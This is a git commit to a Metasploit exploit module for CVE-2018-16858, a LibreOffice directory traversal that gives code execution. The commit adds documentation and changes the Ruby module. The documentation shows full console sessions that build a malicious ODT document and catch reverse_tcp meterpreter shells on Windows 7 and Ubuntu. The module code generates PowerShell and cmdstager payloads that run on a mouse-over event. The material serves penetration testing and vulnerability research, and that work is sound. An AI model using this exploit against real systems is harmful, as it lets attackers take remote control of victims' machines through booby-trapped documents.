added documentation and changes for module

2019-04-15 08:26:11 -05:00 · 2019-04-15 08:26:11 -05:00 · 8dc8a18d2b
parent da0c0d7d3f
commit 8dc8a18d2b
2 changed files with 83 additions and 14 deletions
--- a/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md
@ -1,8 +1,8 @@
 ## Description

-  This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.4.1` that enables remote code execution.
-  Note: `6.0.x` versions are vulnerable to the directory traversal attack, but are not exploitable by this module due to the
-  lack of ability to pass arguments.
+  This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
+  Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
+  this module due to the lack of ability to pass arguments.

  LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
  to them. A macro can be tied to a program event by including the script that contains the macro and the function
@ -32,10 +32,66 @@

 ## Scenarios

-### Version of software and OS as applicable
+### Tested on LibreOffice 6.1.2.1 running Windows 7

  ```
-  msf > use module_name
-  msf auxiliary(module_name) > set POWERLEVEL >9000
-  msf auxiliary(module_name) > exploit
+  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec 
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
+
+  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [*] Sending stage (179779 bytes) to 192.168.37.156
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500
+
+  meterpreter > getuid
+  Server username: WIN-MGMN7ND70I1\a_user
+  meterpreter > sysinfo
+  Computer        : WIN-MGMN7ND70I1
+  OS              : Windows 7 (Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 1
+  Meterpreter     : x86/windows
+  ```
+
+### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1
+  target => 1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
+
+  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set LHOST 192.168.37.1
+  LHOST => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (985320 bytes) to 192.168.37.174
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 192.168.37.174
+  OS           : Ubuntu 18.04 (Linux 4.18.0-16-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
  ```
--- a/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@ -12,8 +12,20 @@ class MetasploitModule < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'Placeholder',
+      'Name'           => 'LibreOffice Macro Code Execution',
      'Description'    => %q{
+        LibreOffice comes bundled with sample macros written in Python and
+        allows the ability to bind program events to them. A macro can be tied
+        to a program event by including the script that contains the macro and
+        the function name to be executed. Additionally, a directory traversal
+        vulnerability exists in the component that references the Python script
+        to be executed. This allows a program event to execute functions from Python
+        scripts relative to the path of the samples macros folder. The pydoc.py script
+        included with LibreOffice contains the tempfilepager function that passes
+        arguments to os.system, allowing RCE.
+
+        This module generates an ODT file with a mouse over event that
+        when triggered, will execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
@ -26,6 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
          [ 'CVE', '2018-16858' ],
          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
        ],
+      'Platform'       => [ 'win', 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          [
@ -42,18 +56,17 @@ class MetasploitModule < Msf::Exploit::Remote
              'Platform'        =>  'linux',
              'Arch'            =>  ARCH_X86,
              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
-              'CmdStagerFlavor' =>  [ 'printf' ]
+              'CmdStagerFlavor' =>  'printf'
            }
          ]
        ],
      'DisclosureDate'  =>  "Oct 18, 2018",
      'DefaultTarget'   =>  0
-    )
-  )
+    ))

    register_options(
    [
-      OptString.new('FILENAME', [true, 'Output file name', 'librefile.fodt'])
+      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
    ])
  end

@ -62,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
    {
      :remove_comspec       =>  true,
      :method               =>  'reflection',
-      :wrap_double_quotes   =>  false,
      :encode_final_payload =>  true
    }
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
@ -70,13 +82,14 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def gen_linux_cmd
-    @cmd = generate_cmdstager
+    @cmd = generate_cmdstager.first
    @cmd << ' &amp;&amp; echo'
  end

  def gen_file(path)
    text_content = Rex::Text.rand_text_alpha(10..15)

+    # file from Alex Inführ's PoC post referenced above
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
    libre_file = ERB.new(fodt_file).result(binding())
    libre_file